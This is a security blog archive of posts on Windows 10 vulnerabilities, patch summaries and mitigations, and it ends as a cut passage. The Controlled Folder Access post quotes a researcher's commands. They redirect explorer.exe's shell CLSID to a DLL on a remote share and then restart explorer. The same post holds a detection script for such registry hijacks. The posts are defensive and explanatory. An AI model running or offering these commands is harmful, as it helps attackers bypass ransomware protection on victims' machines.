Tag Archives: Microsoft Windows 10

Windows 10 NTFS Corruption Vulnerability

====================

Update: 20th April 2021

====================

Microsoft have released a security update (part of the April 2021 security updates) to address this vulnerability. Please install it to resolve this vulnerability. My thanks to BleepingComputer for the article linked to above.

Thank you.

====================

TL;DR:
Exercise standard caution when receiving unexpected email attachments or downloading attachments from websites. An unofficial fix is also available (please see below for the link). Mozilla Firefox 85.0.1 prevents exploitation from within that browser.

In mid-January 2021 a security researcher publicly disclosed a software bug within Windows 10 that could be used to cause a denial of service (DoS) on an affected system.

Why should this vulnerability be considered important?
This issue is very easy to trigger (via one line of code within a Windows shortcut file (.lnk), a ZIP archive or a batch file (*.bat)) and affects standard user accounts, not just administrator accounts, within Windows 10 Version 1803 and later. Separately, Windows XP is also affected but will not be patched against this issue.

This article from The Verge provides a summary: “Attackers can hide a specially crafted line inside a ZIP file, folder, or even a simple Windows shortcut. All a Windows 10 user needs to do is extract the ZIP file or simply look at a folder that contains a malicious shortcut and it will automatically trigger hard drive corruption”.

More alarming is that some systems on which this command was executed were repairable via Microsoft’s Check Disk (Chkdsk) utility, while at other times the same system was rendered unbootable.

How can I protect my organisation or myself from this vulnerability?
Please exercise standard caution when receiving unexpected email attachments or downloading attachments from websites, since these sources could contain a Zip file. The Zip could contain a shortcut file designed to exploit this vulnerability. This will significantly lower the possibility of exploitation.

If you believe the risk of users within your organisation opening a Zip attachment is too high, please consider installing this unofficial filter driver which will mitigate the issue until an official fix from Microsoft is available.

Mozilla Firefox 85.0.1 prevents the exploitation of this issue from within Firefox but the other means of exploiting it from within Windows remain.

Thank you.

Special thanks to “The Verge” for the summary included above.

Adobe Flash Player Approaching Final Milestone

TL;DR:

With Adobe Flash Player nearing its end of life, if you use it for any locally saved content or games you may wish to consult the alternatives presented below or the Sophos blog post linked to below (that post provides suggestions from their community). If you don’t use Flash Player, you don’t need to take any action; Mozilla Firefox, Google Chrome and Microsoft are taking steps to disable and remove Flash.

=======================
Update: 12th January 2021
=======================
According to the following links, Flash Player will be phased out of use within major web browsers on the following dates:

=======================
12th January: Microsoft will remove Flash Player from Internet Explorer and Microsoft Edge (Legacy) via the monthly cumulative security update. This does not appear to have taken place. However, it appears this will take place in the coming weeks.

21st January: Flash Player will be removed from Google Chrome and Microsoft Edge (Chromium) when version 88 of the browsers is released.

26th January: Mozilla will release Firefox 85 which will no longer support Adobe Flash.
=======================

For supported versions of Windows namely 10, 8.1 and their Server equivalents; the following uninstaller “update” from Microsoft would apply:

https://support.microsoft.com/en-us/help/4577586/update-for-removal-of-adobe-flash-player

For older systems, the uninstaller from Adobe would apply:

https://helpx.adobe.com/flash-player/kb/uninstall-flash-player-windows.html

A definitive list of ways to remove Flash is provided in the following blog post:

https://www.askwoody.com/2021/tasks-for-the-weekend-january-9-2021/

My thanks to Susan Bradley of AskWoody.com for this really useful post.

Thank you.

=======================
What milestone is Adobe Flash Player approaching?
On the 1st of January 2021 Adobe will no longer support or provide security updates for Adobe Flash Player. Most web browsers will disable its use and Microsoft will release an uninstaller for it in the coming months. This will remove the once highly targeted piece of software from your systems. This will mean one less set of updates to regularly deploy.

What are my options if I still use Flash?
One solution I located online is to install and use the Flash Player debugger which will allow you to open Flash (.swf, technically named Shockwave Flash) files belonging to games stored on your computer (this option likely won’t be available from Adobe’s website after the 31st of December 2020).

This option isn’t without risk. The Flash Debugger will no longer be updated after 31st December. If you need to continue using it, try to isolate the system it is used on and make certain the system is at least protected with a firewall (a proxy server or web application firewall in the case of a corporate environment). Don’t open unknown or unexpected Flash (.swf) files.

Other suggestions for playing games are provided within this Sophos blog post (their community have posted some suggestions). VideoLAN VLC can play *.swf files. The free IrfanView has a Flash plugin but appears to require Adobe’s Flash Player too and seems not to be trivial to use.

If I don’t want to wait to uninstall Flash, what options do I have?
This article explains how to uninstall Flash on Linux, specifically the Ubuntu, Linux Mint, or Debian distributions.

For Apple Mac OS X 10.1 to 10.3, there is an uninstaller available with the appropriate steps to use it here.

For Apple OS X 10.4 and later; there is an uninstaller available with the appropriate steps to use it here.

I have listed the options for Windows last since it has the most complicated options. For Windows 7 and earlier; you can use the Adobe provided uninstaller from here.

For Windows 8.1 and later you can either wait until Microsoft issues a Flash Player uninstaller automatically in January 2021 (predicted) or for Windows 8.1 and Windows 10 you can manually install this Microsoft update which will uninstall the integrated version of Flash from Windows.

This manual uninstaller removes only the version of Flash built into Windows (used by Internet Explorer). Any other browsers will keep their versions of Flash. The standalone version of Flash PPAPI (used by Google Chrome and Microsoft Edge) and the older NPAPI versions of Flash will not be removed. You can use the Adobe provided uninstaller from here to remove those or uninstall them using the Apps and Features settings window (Windows 10) or Programs and Features window of Control Panel (Windows 8.1).

Many thanks to Lawrence Abrams of BleepingComputer.com for testing this new update and providing the clarification of what the update (the uninstaller) does and does not do. The community of BleepingComputer.com also contributed to the post linked to above.

How does this transition affect me, personally?
For me, the impact is minimal; perhaps none. I have some old training videos that were created in *.swf format that VideoLAN VLC can play. Apart from this, I have not used Flash Player in many years, but I always kept the built-in version of Windows up to date.

I do remember YouTube using Flash many years ago before the switch to HTML 5. Versions 10.1 and 11 of Flash brought smooth HD ready video viewing to YouTube which back in 2010 and 2011 was quite impressive. Previous to this an HD video would make a laptop or a low grade desktop system struggle. I welcome the removal of Flash since it will be one less plugin to maintain.

It’s arguable if security is immediately increased with the removal of Flash since many browsers have blocked Flash for several years. Before this, the plugin was also made “click to play” (which increased security a lot, far better than just automatically running). Security exploits for Flash became more scarce as its end of life was announced and as HTML 5 became more mature. It is possible after the end of life of Flash Player in December 2020, more vulnerabilities may be reported and that is when I believe this removal will begin to provide a benefit. However, from an attack surface reduction point of view, removing Flash Player will provide a security benefit. For most people, the removal of Flash Player will likely not be noticed.

I will keep the Flash Player tracker post updated until the end of 2020. After this, all of those posts will be redundant but will remain on this blog for your reference.

I hope the above suggestions are useful. Thank you.

Microsoft Adds Security Mitigations to Windows 10 Version 2004

TL;DR:
Windows 10 Version 2004 includes a further security mitigation which promises to all but eliminate a class of common vulnerabilities. If your system is compatible with Windows 10 Version 2004, you can begin to benefit right now from these changes. Software developers can also optionally use this new feature.

=======================
During the development of the most recent version of Windows 10, Version 2004, Microsoft sought to block threat actors from exploiting a specific class of vulnerabilities that make up between 5 and 10% of all Microsoft security vulnerabilities observed in the recent past.

How did Microsoft seek to address this class of vulnerabilities?
A design to mitigate uninitialised kernel (defined) pool memory was chosen since Microsoft does not always wish to rely on static analysis (defined), fuzzing (defined), or a code review to detect and prevent the introduction of vulnerabilities into production software before a threat actor locates them. Ideally the code should contain no uninitialized kernel pool issues by design.

Will this extra step within the code decrease performance?
Setting the heap memory to a known value before use, while more secure, will be slower. Microsoft thus carried out tests to determine just how much of an impact this would have.

Initial tests showed a 15% decrease in performance. Once the issues those tests identified within the code were fixed, the tests were re-run. The performance impact on a test web server, which is very sensitive to small changes in its operations, was approximately 1% with experimental error.

The results of the test carried out by Microsoft can be summarised as follows:

  1. Smaller allocations of memory were more common, but the performance impact of the new mitigations was not unreasonable.
  2. Since performance of this security mitigation was already acceptable, very little was done to optimise the implementation apart from the following:
    1. If large memory allocations are requested, the Windows memory manager will attempt to use memory that has already been zeroed. Thus, large amounts of memory can be quickly allocated.
    2. It was found that some newly allocated memory was being zeroed out twice; further checks will seek to make certain that in general newly allocated memory is only zeroed out once.

How can software developers take advantage or opt-out of this new security mitigation?
Microsoft created a new API for hardware drivers (defined) that allows a developer to have memory they request zeroed before use. This was chosen since non-Microsoft software compilers can also take advantage of this new change. Further details of the new API names are provided in Microsoft’s blog post.

An ability for software developers to opt-out of the zeroing of requested memory if the performance of their software is significantly impacted has been provided.

When will this security mitigation be available in Windows 10?
The deployment of this new memory management technique has already taken place within Windows 10 Version 2004 and will be featuring in Hyper-V and the networking components of Windows in the near future. The code written by developers can be shorter since they no longer need to zero initialise memory themselves. Microsoft has plans to bring these changes to 3rd party drivers too but this is still an early work in progress.

Thank you.

April 2020 Update Summary

=======================
Update: 27th April 2020
=======================
Late last week, Microsoft issued a security advisory for Microsoft Office 2019, 365 ProPlus and Paint 3D (available within Windows 10).

These correct 4 remote code execution (an attacker can carry out any action of their choice on a compromised system) and 2 denial of service (in this instance the affected application will become unresponsive) vulnerabilities. These vulnerabilities also affect the following Autodesk products:

FBX-SDK
Maya
Motion Builder
Mudbox
3ds Max
Fusion
Revit
Flame
Infraworks
Navisworks
Autodesk AutoCAD

Please make certain your versions of the affected Autodesk products, Office 2019 or 365 ProPlus and Paint 3D are up to date. The steps detailed in this linked to BleepingComputer article will guide you through doing so. The Paint 3D app should have already installed the update automatically. However, you can manually check for updates with these steps.

The necessary details to update the affected Autodesk products are available in the above linked to Autodesk security advisory. Details for verifying if Paint3D and Microsoft Office have been updated are provided in Microsoft’s advisory. Please see the questions titled: “I am running Office 2019 or Office 365 ProPlus. How do I tell if the security update for this vulnerability is included in my version of Office?” and “I have Paint 3D or 3D Viewer installed. How do I know if I have the security update installed?” Further details of the potential impact of these vulnerabilities as well as a recommended mitigation step are provided in this Sophos blog post.

Thank you.

=======================
Update: 15th April 2020
=======================
Yesterday Microsoft released their scheduled updates to resolve 113 CVEs (defined). Similarly Adobe released 3 security bulletins.

Microsoft’s monthly summary lists Known Issues for 43 Microsoft products but all have workarounds or resolution steps listed.

To begin with, let’s look at Adobe’s updates:
Adobe After Effects: 1x Priority 3 CVE resolved (1x Important severity)
Adobe ColdFusion: 3x Priority 2 CVEs resolved (3x Important severity)
Adobe Digital Editions: 1x Priority 3 CVE resolved (1x Important severity)

Adobe later issued further updates:
Adobe Bridge: 17x Priority 3 CVEs resolved (14x Critical severity, 3x Important severity)
Adobe Illustrator: 5x Priority 3 CVEs resolved (5x Critical severity)

If you use the above Adobe products, please install these updates (especially in the case of the above critical vulnerabilities within Bridge and Illustrator).

====================
A further useful source of update related information is the US Computer Emergency Readiness Team (CERT) (please see the “Information on Security Updates” heading of the “Protecting Your PC” page):

https://www.us-cert.gov/

====================
As always for this month’s Microsoft updates, I will prioritize the order of installation below:
====================
Following disclosure last month, the Adobe Type Manager (ATM) vulnerabilities have been patched in addition to the following zero day vulnerabilities and a further publicly disclosed vulnerability:

Zero Days (defined):
Microsoft Adobe Type Manager: CVE-2020-0938 and CVE-2020-1020
Microsoft Scripting Engine: CVE-2020-0968
Windows Kernel: CVE-2020-1027

Publicly disclosed:
Microsoft OneDrive: CVE-2020-0935

====================
Microsoft Scripting Engine: CVE-2020-0970
Microsoft Chakra Scripting Engine: CVE-2020-0969
Microsoft Graphics: CVE-2020-0687
Microsoft Graphics Components: CVE-2020-0907
Windows DNS: CVE-2020-0993
Windows Hyper-V: CVE-2020-0910
Windows Codecs: CVE-2020-0965
Windows Media Foundation: CVE-2020-0948, CVE-2020-0949, CVE-2020-0950
Microsoft SharePoint: CVE-2020-0929, CVE-2020-0931, CVE-2020-0932, CVE-2020-0974
Microsoft Office SharePoint XSS: CVE-2020-0927
Microsoft Dynamics: CVE-2020-1022

====================

Please install the remaining updates at your earliest convenience.

As per standard best practice, I would recommend backing up the data on any device for which you are installing updates to prevent data loss in the rare event that any update causes unexpected issues.

I have also provided further details of updates available for other commonly used applications and devices below.

To all of my readers and your families, please stay safe during these challenging times. Thank you.

====================
Mozilla Firefox
====================
On the 7th of April, Mozilla released Firefox 75 and Firefox ESR (Extended Support Release) 68.7 to resolve the following vulnerabilities:

Firefox 75.0: Addresses 3x high severity CVEs, 3x moderate severity CVEs

Firefox 68.7 ESR: Addresses 4x high severity CVEs (1 of which only affects Firefox for Android) and 1x moderate severity CVE

Firefox 75 and the previous 74.0.1 reverse the removal of support for TLS 1.0 and TLS 1.1 due to the current COVID-19 situation. It offers improved performance when installed on systems powered by Intel GPUs (defined), is available in the Flatpak distribution format for Linux and offers improved performance by “locally cache all trusted Web PKI Certificate Authority certificates that Mozilla knows, improving security and HTTPS compatibility with misconfigured web servers as a direct result”. Moreover, an improved address bar is now present in Firefox 75. Its improvements are detailed in Firefox’s release notes. Please also be aware of the new telemetry Mozilla has begun to collect with Firefox 75; you may or may not wish to turn this off.

Firefox 74.0.1 and Firefox ESR 68.6.1 were released on the 3rd of April to resolve the following zero day (defined) vulnerabilities actively being exploited in targeted attacks:

Firefox 74.0.1 and Firefox 68.6.1 ESR: Addresses 2x critical severity CVEs

Details of how to install updates for Firefox are here. If Firefox is your web browser of choice, if you have not already done so, please update it as soon as possible to benefit from the above changes.

====================
VMware
====================
VMware released 3 security advisories to resolve vulnerabilities within the following products:

VMware vCenter Server
VMware vRealize Log Insight
VMware ESXi 6.5 up to and including 7.0

====================
Advisory 1: Severity: Critical:
VMware vCenter Server

Advisory 2: Severity: Important
VMware vRealize Log Insight

Advisory 3: Severity: Important:
VMware ESXi 6.5 up to and including 7.0
====================

If you use any of the above products, please review the above advisories and install the applicable security updates as soon as possible.

=======================
Oracle:
=======================
Oracle issued updates to resolve 405 vulnerabilities this month. Further details and installation steps are available here. 15 vulnerabilities affect the Java runtime; all of which are remotely exploitable without an attacker needing to obtain a user’s username and password (their credentials).

Separately, Oracle has issued a notice that attacks are being detected attempting to exploit a patched vulnerability (CVE-2020-2883) in Oracle WebLogic Server. They strongly suggest installing this month’s update for that product to protect against these attacks.

If you use any of the Oracle products listed here, please install the appropriate security updates as soon as possible.

====================
OpenSSL
====================
On the 21st April the OpenSSL Foundation issued OpenSSL 1.1.1g which includes a high severity security fix.

FTP mirrors to obtain the necessary downloads are available from here. Downloadable Tarballs (compressed/packaged code made for distribution) are available from here.

It should also be possible to use the package manager of a Linux/Unix operating system to update your OpenSSL installation as mentioned within the section titled “Installing updates for Linux distributions” on the “Protecting Your PC” page of this blog.

=======================
WinSCP:
=======================
In early April WinSCP version 5.17.3 was made available upgrading its version of OpenSSL to 1.1.1f (from the previous version of 1.1.1d). This update resolves 1x Low severity vulnerability.

On the 24th of April, WinSCP was upgraded to version 5.17.4 which also upgrades its version of OpenSSL to version 1.1.1g resolving a high severity vulnerability. Please install this update if you use WinSCP.

====================
VideoLAN VLC
====================
On the 28th of April, VideoLAN released version 3.0.10 resolving multiple security issues (version 3.2.12 for Android and version 3.2.7 for iOS were also released) assigned to 7 CVEs (various denial of service (DoS) issues in the microDNS service discovery). 1 CVE has been rated as critical with the other 6 being of high severity. The most recent versions can be downloaded from:

http://www.videolan.org/vlc/

====================
Wireshark
====================
In early April, Wireshark made available the following updates (I’ll detail only the 2 most recent versions here):

v3.2.3: Relating to 1 security advisory (relating to 1 CVE)
v3.0.10: Relating to 1 security advisory (relating to 1 CVE)

As per standard process, Linux distributions can obtain this update using the operating system’s standard package manager (if the latest version is not installed automatically using the package manager you can instead compile the source code (v3.2.4 or v3.0.9)). This forum thread and this forum thread may also be helpful to you with installing Wireshark on your Linux based system.

For Mac OS X and Windows, the update is available within the downloads section of the Wireshark website. In addition, a detailed FAQ for Wireshark is available here.

Thank you and please stay safe.

Magellan 2.0 SQLite Vulnerabilities: What you need to know

====================
[TL DR]
====================
If you use any of the affected products e.g. Google Chrome, Mozilla Firefox or Android WebView (full list provided below), please make certain to update them to the latest version available.

In the closing days of December, security researchers from the Tencent Blade team disclosed five vulnerabilities that affect the SQLite database. This is used in products such as Google Chrome, Android WebView, Mozilla Firefox and Windows 10 (among others):

https://blade.tencent.com/magellan2/index_en.html

Why should these vulnerabilities be considered important?
Due to the widespread use of the affected products and the severity of the vulnerabilities, the potential for a large impact is present. These vulnerabilities if exploited could allow “remote code execution in Chromium render process”.

However, the CVSS base scores (defined) for all but one vulnerability (at 8.8: High) are 6.5 Medium severity. Thus, these vulnerabilities are NOT critical but medium to high severity. The rationale for this is explained by the creator of SQLite, D. Richard Hipp. While the comment is from 2018 it is still valid since most applications which use SQLite are not impacted by remote attacks:

“Reports of an RCE vulnerability in SQLite are greatly exaggerated. Some clever gray-hats found a way to get RCE using maliciously crafted SQL. So, IF you allow random internet users to run arbitrary SQL on your system, you should upgrade. Otherwise, you are not at risk” (Source).

While Chromium based browsers effectively do allow “random internet users to run arbitrary SQL”, Google have already issued an update (see below). Other browsers will follow e.g. Opera did so on the 27th of December, upgrading to the same version of Chromium that Google issued, namely 79.0.3945.79.

How can I protect my organisation or myself from these vulnerabilities?
If you use any of the following products, please make certain to update to the most recent versions available. Google made available Chrome version 79.0.3945.79 on the 10th of December to resolve these vulnerabilities with Opera following on the 27th of December:

Affected Products (among others):
Chrome/Chromium prior to version 79.0.3945.79
Smart devices using old version of Chrome/Chromium.
Browsers built with old version of Chromium/Webview.
Android Apps that uses old version of Webview and can access any web page.
Software that uses the old version of Chromium and can access any web page.

Thank you.

Researching the recent Windows CTF Vulnerabilities

================
TL DR
================
There are no known mitigations for these vulnerabilities. Please see below for a more in-depth explanation.
================

With the release of security updates by Microsoft in September and August to resolve vulnerabilities in the Windows ALPC and Windows Text Service Framework, I wish to provide details on these vulnerabilities.

Why should these vulnerabilities be considered important?
If an attacker were to have ALREADY compromised a vulnerable Windows system, they can then use the exploits made available by Google’s Tavis Ormandy to fully compromise your system. They can obtain the highest level of privilege on it namely NT Authority\System (equivalent to root on a Linux system).

Ormandy found that the running ctfmon.exe of Windows allowed a standard user of Windows to hijack any Windows process even if that process was sandboxed within an AppContainer (a means of isolating sensitive/important processes making them harder to attack). When an attacker does so they can obtain administrative and under some circumstances NT Authority\System level access.

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1162

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1235

How can I protect my organization and myself from these vulnerabilities?
Apart from installing the above linked to updates, I’m afraid no other mitigations are available. You will need to exercise standard vigilance/caution with opening links. Don’t open attachments you weren’t expecting even from trusted contacts.

This advice is an unfortunate outcome. I had a hypothesis that disabling the ctfmon.exe process (Windows XP, Windows Vista and Windows 7) or the Touch Keyboard and Handwriting Panel service in Windows 8.1 and 10 would mitigate this class of vulnerabilities. This was not the case; Ormandy’s tool worked regardless of whether the ctfmon.exe process was running or not, which now makes sense given how his tool exploits a deeply integrated feature of Windows with a scope much larger than that of the above mentioned process and service.

================
Proof of Concept
================
As a proof of concept on an un-patched version of Windows 10 Version 1903, I can confirm Tavis Ormandy’s CTFTool successfully provides you with both System and Administrative access (depending on the type of exploit you run). Only administrative access is available for Windows 7; the tool does not incorporate the System level exploit for Windows 7. Further details of this tool are available at the following links:

https://googleprojectzero.blogspot.com/2019/08/down-rabbit-hole.html

https://github.com/taviso/ctftool

Thank you.

Retpoline To Improve Windows 10 Performance Following Spectre Vulnerability

Alex Ionescu, a Windows Internals expert and Security Architect with CrowdStrike, in mid-October provided new insight into performance improvements coming to the next update of Windows, namely 19H1 or Version 1903.

With performance decreases estimated to be up to 30% in the worst-case scenarios while mitigating the Spectre vulnerabilities earlier this year, the upcoming version of Windows will add Google’s Retpoline instructions to improve performance.

Such instructions are already present in Red Hat, SUSE and Oracle Linux 6 and 7. Ionescu revealed that performance was significantly improved while testing the newer version of Windows 10. Moreover, Spectre variant 2 (CVE-2017-5715) will now be fully mitigated even if your hardware was not updated to support indirect branch restricted speculation (IBRS), making it more secure. In his words “On systems without IBRS, Windows won’t flush the BPB on kernel->user transitions. This opens up a potential security issue for CPUs without microcode that implements IBRS”.

He also confirmed that Retpoline is enabled on systems with indirect branch prediction barrier (IBPB). This will protect such systems from kernel to user transitions where currently no protection exists. Finally he asked that Retpoline be back ported to earlier (but currently supported) versions of Windows since systems without IBRS are “sitting ducks”.

These changes were also announced by a Microsoft engineer, Mehmet Iyigun working within the Windows and Azure kernel team.

In April 2019 we can look forward to a more secure and faster version of Windows. I’m particularly pleased to learn this since my water cooled Intel processor, an 18 core (36 thread) Core i9 7980XE, has received full protection from Spectre in the form of IBRS and IBPB from the motherboard vendor. Performance impact has been minimal but any increase in performance is welcomed for my donations to Stanford’s Folding@Home project.

More info on IBRS and IBPB is available from this link. Thank you.

Security Researcher Demonstrates Bypass for Controlled Folder Access

In Windows 10 version 1709 (also known as the Fall Creators Update or Redstone 3) and later versions, Microsoft introduced a feature known as Controlled Folder Access which aims to prevent ransomware (or unknown applications) from encrypting files within folders that you specify. Further details are provided here.

Last week at the DerbyCon security conference a security researcher, Soya Aoyama from Fujitsu System Integration Laboratories demonstrated how DLL injection (The technique of DLL injection is explained in more detail here and here.) could be used to add a DLL (defined) to the user interface (UI) of Windows 10 (in the form of the shell process, explorer.exe).

Controlled Folder Access works by preventing any application not present on a whitelist (a list of allowed applications) from modifying the files in the folders listed as requiring protection. The fact that explorer.exe is present on that allowed list enabled the researcher to bypass this ransomware protection by adding the DLL as a context menu handler. This list of context menu handlers would usually allow you to, for example, perform an anti-malware scan on a file by right clicking or compress a file using 7-Zip. This list is stored in the Windows Registry at the following location:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers

In order to interact with a user, explorer.exe by default loads shell.dll from the following location:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\InProcServer32

Aoyama changed the DLL value from shell.dll to his DLL in order that explorer.exe would load it when it started. He then terminated and restarted explorer.exe to successfully load his DLL.

Microsoft currently not in favour of patching this vulnerability
As per Microsoft’s 10 immutable laws of security, at this time they don’t intend to patch this vulnerability since it relies on an attacker having already compromised your system and using it to run a legitimate command to load a malicious DLL into explorer.exe:

reg add HKCU\Software\Classes\CLSID\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\InProcServer32 /f /ve /t REG_SZ /d \\10.0.1.40\tmp\Anti-ControlledFolderAccess.dll

taskkill /IM explorer.exe /F

start explorer.exe

Due to this pre-requisite of compromising the system first, this issue won’t be patched. This bypass however does not require administrative (defined) access. Aoyama also demonstrated that Windows Defender did not detect this bypass; neither did other anti-malware solutions such as Avast, ESET, Malwarebytes Premium or McAfee.

How can I protect myself from this bypass?
There are limited options available at this time to prevent this bypass from occurring. If an attacker can download the necessary DLL to your systems and load it, there is a possibility that your anti-malware solution may detect it since the DLL will likely have a low reputation (it would not be a commonly used file), but this is not guaranteed. This is especially true since other anti-malware vendors did not detect it.

HitmanPro.Alert may detect this DLL on your system before it has been added to explorer.exe but would require you to have the premium version installed and monitoring your systems to do so.

The key to preventing the above from occurring would be to follow standard email and instant messaging best practices and lock your system (requiring a password or other form of authentication when you return to the system) when you are away from it to prevent someone entering commands. Keeping your system up to date will also reduce the risk of such a DLL being downloaded if you were to click on a link in an email or instant message or via a drive by download.

If an attacker can physically access and type commands on your system, application whitelisting in the form of Windows AppLocker would not by default prevent this attack (and even that feature can be bypassed), since the command run by Aoyama makes use of legitimate Windows tools. If an attacker were to try to execute a script for the command (which is far more likely), AppLocker would block it if it is configured to block unknown scripts.

The DLL blocking feature of Windows AppLocker would also assist in this context but may introduce a performance penalty due to the level of effort it needs to undertake to carry out these checks.

Monitoring the location within the Windows Registry for changes using a tool such as Autoruns is also a possibility, but you would need to do this manually and, given that ransomware doesn’t usually wait to encrypt your files, it is likely to be ineffective/too slow to detect this bypass.
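The registry locations named above can also be watched through registry-change telemetry rather than by hand. The following is an added example (not part of the original post and not Microsoft's or the researcher's code): it triages registry value-set events, assumed to be Sysmon Event ID 13 records already parsed into dictionaries, and goes beyond the single CLSID in the post by flagging any per-user COM server or context menu handler registration. The SID, host name and file paths in the sample events are constructed.

```python
import re

# CLSID from the post: a per-user InprocServer32 value for it shadows the
# machine-wide (HKLM) entry, so explorer.exe loads the per-user DLL instead.
WATCHED_CLSID = "{90AA3A4E-1CBA-4233-B8BB-535773D48449}"

# Assumption: input is Sysmon Event ID 13 (registry value set) parsed to dicts.
# Sysmon writes HKCU as HKU\<SID>; per-user classes also appear as HKU\<SID>_Classes.
USER_CLASSES = r"^HKU\\S-1-5-21-[\d-]+(?:_Classes|\\Software\\Classes)"
COM_SERVER = re.compile(
    USER_CLASSES + r"\\CLSID\\(\{[0-9A-F-]{36}\})\\InprocServer32(?:\\|$)", re.I)
MENU_HANDLER = re.compile(
    USER_CLASSES + r"\\\*\\shellex\\ContextMenuHandlers\\", re.I)

def triage(event):
    """Return (severity, reasons) for a suspicious value-set event, else None."""
    target, data = event["TargetObject"], event.get("Details", "")
    reasons = []
    com = COM_SERVER.match(target)
    if com:
        reasons.append("per-user COM server registration")
        if com.group(1).upper() == WATCHED_CLSID:
            reasons.append("overrides the CLSID explorer.exe loads")
    elif MENU_HANDLER.match(target):
        reasons.append("per-user context menu handler")
    else:
        return None  # anything else, including HKLM writes, is out of scope
    if data.startswith("\\\\"):
        reasons.append("DLL served from a UNC path")
    return ("high" if len(reasons) > 1 else "medium"), reasons

# Constructed sample events: the SID, host name and file paths are made up.
SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
VALUE = r"\CLSID\%s\InprocServer32\(Default)"
EVENTS = [
    {"Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": "HKU\\" + SID + r"\Software\Classes" + VALUE % WATCHED_CLSID,
     "Details": r"\\fileserver.example\share\handler.dll"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\SOFTWARE\Classes" + VALUE % WATCHED_CLSID,
     "Details": r"C:\Program Files\Example\example.dll"},
    {"Image": r"C:\Users\alice\AppData\Local\Example\setup.exe",
     "TargetObject": "HKU\\" + SID + "_Classes" + VALUE % "{11111111-2222-3333-4444-555555555555}",
     "Details": r"C:\Users\alice\AppData\Local\Example\shellext.dll"},
]

for ev in EVENTS:
    print(ev["Image"], "->", triage(ev))
```

Legitimate software also registers per-user COM servers, so "medium" results are candidates for an allow list rather than alerts on their own.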

Given the attention this bypass has received, anti-malware software may detect changes to the explorer.exe context handlers or the shell location going forward, but again this is not guaranteed.

I am investigating another option and will update this post when I have more information available.

Thank you.

Protecting Against the Windows 10 Task Scheduler Zero Day Vulnerability

====================
Update: 5th September 2018:
====================
As previously advised; exercising caution when receiving emails with attachments will keep you safe from the following malware now exploiting this vulnerability.

Your anti-malware software will likely also protect you from this exploit since the majority of vendors are detecting (verified using VirusTotal) the file hashes listed in the security firm Eset’s blog post:

Eset have detected attackers delivering an exploit for this vulnerability via email. The exploit targets victims in the following countries:

  • Chile
  • Germany
  • India
  • Philippines
  • Poland
  • Russia
  • Ukraine
  • United Kingdom
  • United States

The attackers have made small changes of their own to the published proof of concept code. They have chosen to replace the Google Updater (GoogleUpdate.exe), which runs with admin privileges (high level of integrity) and is usually located at:

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

They replace the updater with a backdoor application of their own that is run with the highest privilege, namely System level integrity. This is stage one of their attack. If the attackers find anything of interest on the infected system, a second stage is downloaded allowing them to carry out any commands they choose, upload and download files, shut down an application or parts of Windows of their choice and list the contents of the data stored on the system.

The attackers also use the following tools to move laterally from system to system across a network: PowerDump, PowerSploit, SMBExec, Quarks PwDump, and FireMaster.

Thank you.

====================
Original Post:
====================
With the disclosure early last week of a zero day vulnerability (defined) I wanted to provide some advice on staying safe while a patch from Microsoft is being developed.

What systems are affected and how can an attacker use this vulnerability to compromise systems?
Once this pre-developed working exploit is delivered to a 64 bit Windows 10 system it can be used to provide an attacker with the highest level of privilege (System level access) on that system, allowing them to carry out any action they choose. They can achieve this by changing permissions on any file stored on a system, thus giving them the ability to replace/change any file. When a system service executes what it believes to be a legitimate file but is instead the attacker-substituted file, the attacker obtains the privileged access of that service.

The effectiveness of this exploit has been verified by Will Dormann from the CERT/CC. 32 bit versions of Windows are also affected. For Windows 8.1 and Windows 7 systems, the exploit would require minor changes before it can result in the same level of effectiveness (but may be inconsistent on Windows 7 due to the hardcoded XPS printer driver (defined) name within the exploit).

An attacker must already have local access to the systems they wish to compromise but could obtain this using an email containing an attachment or another means of having a user click on a link to open a file. The base CVSS score of this vulnerability is 6.8, making it of medium severity for the above reasons.

How can I protect myself from this vulnerability?
Standard best practice/caution regarding the opening of email attachments or clicking links within suspicious or unexpected email messages or links from unknown sources will keep you safe from the initial compromise this exploit code requires to work correctly.

The advisory from the CERT/CC has also been updated to add additional mitigations. BEFORE deploying these mitigations please test them thoroughly since they can “reportedly break things created by the legacy task scheduler interface. This can include things like SCCM and the associated SCEP updates”.

A further option you may wish to consider is the deployment of the following micropatch from 0Patch. This patch will automatically cease functioning when the relevant update from Microsoft is made available. As with the above mitigations; if you wish to deploy this micropatch please test how well it works in your environment thoroughly BEFORE deployment.

Further advice on detecting and mitigating this exploit is available from Kevin Beaumont’s post.

Thank you.

Blog Post Shout Out: June 2018

A number of varied security issues have come to my attention this week which I wanted to keep you informed of. I will provide a respectful shout out to the following sources:

Apple Encrypted Drive Information Disclosure:
At this time Apple macOS has an information disclosure vulnerability that affects encrypted drives in general (encrypted Apple HFS+ / APFS+ and VeraCrypt) and provides the potential for an attacker to obtain details of the files an encrypted hard drive is storing.

This vulnerability originates from the quick look feature of macOS; which allows a user to preview photos, files and folders quickly without having to open them. This feature stores the thumbnails (defined) of the files centrally in a non-encrypted area of the hard disk. This issue can also occur when a USB memory drive is inserted; the same feature stores thumbnails on the external drive and on the boot drive of the macOS system.

If you use an encrypted hard disk or value your privacy when using external drives, please run the following command documented at the end of the following news article after you have viewed sensitive info and want to clear that history/activity:

macOS Breaks Your OpSec by Caching Data From Encrypted Hard Drives: BleepingComputer by Catalin Cimpanu

This suggestion is a workaround until (and if) Apple patches this.

=================
Yubico WebUSB Bypass:
The two-factor authentication/secure login vendor, Yubico has published a security advisory for the use of their YubiKeys. The vulnerability does not reside within the hardware keys themselves but in the authentication steps a web browser (e.g. Google Chrome) uses to authenticate an individual.

In summary, if you are using Google Chrome, please ensure it is updated to version 67 or later and follow the additional suggestion from Yubico in their security advisory:

Security Advisory 2018-03-02 – WebUSB Bypass of U2F Phishing Protection: Yubico

Windows 10 Persistent Malware:
